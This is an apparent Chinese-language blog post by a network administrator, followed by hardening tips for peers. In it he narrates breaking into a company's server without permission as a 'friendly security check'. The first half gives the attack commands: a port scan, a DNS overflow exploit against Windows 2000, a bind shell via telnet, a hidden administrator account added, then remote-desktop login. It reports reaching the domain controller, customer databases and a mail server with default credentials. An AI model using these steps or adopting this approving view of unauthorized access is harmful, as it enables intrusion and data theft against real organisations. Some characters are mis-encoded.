從一次友情安全檢測談起。前段時(shí)間,我上某企業(yè)的網(wǎng)站查找資料??淳W(wǎng)頁(yè)做得極其精致,于是想看看安全性到底如何。網(wǎng)站是Asp動(dòng)態(tài)頁(yè)面,采用的是某企業(yè)網(wǎng)站系統。
先看看該網(wǎng)站W(wǎng)eb服務(wù)器的IP地址,打開(kāi)命令提示符,敲入如下命令:
ping www.*.com
得知ip地址為:202.2##.*.196
通過(guò)http://www.webhosting.info/查詢(xún)得知這是一臺獨立的服務(wù)器,只有一個(gè)站點(diǎn)。
用掃描器看看,掃描結果,該服務(wù)器開(kāi)了如下端口
| 以下是引用片段: 80 53 1433 25 3389 |
看來(lái)這臺服務(wù)器,開(kāi)了Web端口,這是當然的,因為要運行網(wǎng)站嗎。
開(kāi)了53端口,這是DNS端口,看來(lái)該Web主機也是個(gè)DNS服務(wù)器。
開(kāi)了1433端口,這是SQL-Server數據庫端口,因為是Web服務(wù)器,所有要運行數據庫了。
開(kāi)了25端口,看來(lái)這還是個(gè)郵件服務(wù)器。
開(kāi)了3389端口,可以遠程登錄。
當時(shí)感嘆,這臺服務(wù)器真能干呀!
首先對asp頁(yè)面進(jìn)行了初步測試,看來(lái)沒(méi)有什么明顯的漏洞。既然開(kāi)了53端口,那就看看DNS溢出。找了一個(gè)dns溢出工具,在命令行下敲入如下命令:
dns -s 202.2##.*.196
顯示如下:(圖1)
圖1
竟然存在DNS溢出漏洞!這個(gè)管理員真是失職,連補丁都沒(méi)有打。
服務(wù)器采用的是windows 2000,在1052端口存在DNS溢出漏洞。
繼續在命令行下,敲入如下命令:
dns -t2000all 202.2##.*.196 1052
顯示如下:(圖2)
圖2
溢出成功!重新打開(kāi)另外一個(gè)命令提示符,敲入如下命令:
telnet 202.2##.*.196 1100
速度很快,返回一個(gè)shell,溢出成功。
在telnet界面中敲入如下命令:
net query
顯示如下:(圖3)
圖3
| 以下是引用片段: query user USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >administrator console 0 已斷開(kāi) . 2007-11-7 17:51 |
進(jìn)去看看,在Telnet命令提示符下敲入如下命令
| 以下是引用片段: net user asp$ "test" /add net localgroup administrators asp$ /add |
在本機運行“mstsc”,打開(kāi)“遠程桌面連接工具”,
輸入IP地址:202.2##.*.196
用戶(hù)名:asp$
密碼:test
連接......
成功進(jìn)入!
打開(kāi)“管理工具”,發(fā)現這臺主機,還是一個(gè)域控制器!
打開(kāi)“域用戶(hù)和計算機”,域成員竟然有43511個(gè)??磥?lái)這個(gè)企業(yè)的局域網(wǎng)的規模不小。(圖4)
圖4
然后看數據庫,果然是SQL-SERVER,有兩個(gè)數據庫,一個(gè)是web數據庫,一個(gè)是企業(yè)的數據庫,有銷(xiāo)售、客戶(hù)等資料。
郵件服務(wù)器采用的是WebEasyMail,賬戶(hù)和密碼都是默認的,既然如此它也不在話(huà)下。
安全檢測到此為止,刪掉用戶(hù)和相關(guān)痕跡,給管理員留言,撤人。
至此,完全控制了這臺服務(wù)器。但是豈止如此,該企業(yè)的內部資料,局域網(wǎng)不用在你的掌握之中嗎?
令人費解的是,為什么一臺主機要兼web、數據庫、郵件服務(wù)、域控制器這么多的角色呢?
隨后的幾天進(jìn)行了幾次這樣的測試,發(fā)現這絕不是個(gè)別現象!特別是一些中小企業(yè),往往一個(gè)web服務(wù)器、兼數據庫、郵件服務(wù)器、域控制器中的兩個(gè)或者幾個(gè)角色。
鑒于次,我作為一個(gè)單位的網(wǎng)絡(luò )管理員對我的同行們幾點(diǎn)忠告:
1、打補丁。這應該是企業(yè)網(wǎng)絡(luò )安全的基本要求,也是杜絕網(wǎng)絡(luò )入侵的首要措施。將微軟提供的各種重要系統安全補丁都打上,不要怕麻煩,因為被別人入侵后更麻煩。一旦有新的補丁發(fā)布,網(wǎng)絡(luò )管理員將在發(fā)布后的4小時(shí)內下載并檢查該補丁。鑒于網(wǎng)絡(luò )所面臨的重大風(fēng)險,可能一個(gè)“緊急”的補丁還在測試當中就被發(fā)布了。在所有情況下,部門(mén)必須對補丁進(jìn)行測試(無(wú)論是在補丁發(fā)布前測試或是一邊部署一邊測試),并進(jìn)行相關(guān)的記錄,以備審核和效果追蹤。但是讓人無(wú)奈的是,有部分企業(yè)的網(wǎng)絡(luò )管理員,主機千瘡百孔也不知道補一補。甚至有些管理員自作主張關(guān)閉了“自動(dòng)更新”服務(wù)。就比如這位管理員到現在為止都沒(méi)有打補丁,我寫(xiě)這篇文章時(shí)就是用這臺服務(wù)器截的圖。
2、服務(wù)器分離、專(zhuān)用。最好把web服務(wù)器、數據庫服務(wù)器、郵件服務(wù)器、域控制器分離,各種服務(wù)器專(zhuān)用。這樣不至于一個(gè)攻破全線(xiàn)崩潰。如果企業(yè)由于經(jīng)濟原因沒(méi)有那么多的服務(wù)器,必須要做好服務(wù)器的安全配置。
3、做好安全部署。設置隔離區,把郵件服務(wù)器等放到該區,并把該區的服務(wù)器映射到外網(wǎng)的合法地址上以便nternet網(wǎng)上用戶(hù)訪(fǎng)問(wèn)。嚴禁Internet網(wǎng)上用戶(hù)到企業(yè)內部網(wǎng)的訪(fǎng)問(wèn)。允許企業(yè)內部網(wǎng)通過(guò)地址轉換方式(NAT)訪(fǎng)問(wèn)nternet。允許撥號用戶(hù)通過(guò)撥號訪(fǎng)問(wèn)服務(wù)器到企業(yè)內部網(wǎng)訪(fǎng)問(wèn)。
4、關(guān)閉沒(méi)有用的服務(wù)。最少的服務(wù)就是最大的安全。我在測試中看到有些服務(wù)器開(kāi)了DNS服務(wù)、DHCP服務(wù)、IIS等等,幾乎把所有的服務(wù)都安裝了。但是我看這些服務(wù)器根本就用不著(zhù)它。但恰恰是這些無(wú)用的服務(wù)讓服務(wù)器淪陷。另外比如打印、遠程注冊表操作,信息發(fā)送等不必要的服務(wù)都關(guān)掉。
5、復雜密碼。網(wǎng)絡(luò )管理員大都比較重視管理員密碼,但對于數據庫,企業(yè)郵箱系統都采用默認的密碼,這就非常危險。我在測試中看到有的數據庫服務(wù)器采用了默認的SA賬戶(hù),以sa或者一些簡(jiǎn)單密碼甚至干脆是空密碼!盡管他的管理員密碼如何強,但如果數據庫用了空密碼,那服務(wù)器照樣被拿下。
6.如果沒(méi)必要,IIS一定不要安裝。如果非要安裝一定要進(jìn)行安全設置。我在測試中看到有些數據庫服務(wù)器,卻安裝了IIS。
7、管理員必須會(huì )組策略、IPsec、日志查看。能夠通過(guò)部署組策略使系統更安全,用IPsec進(jìn)行網(wǎng)絡(luò )安全的過(guò)濾,會(huì )查看各種日志(系統日志、安全日志、DNS日志、iis記錄等)。要有靈敏的嗅覺(jué),不然別人入侵了你還不知道。
為了企業(yè)網(wǎng)絡(luò )的安全,也為了自己的飯碗,寫(xiě)出來(lái)與網(wǎng)絡(luò )管理員們共勉。
聯(lián)系客服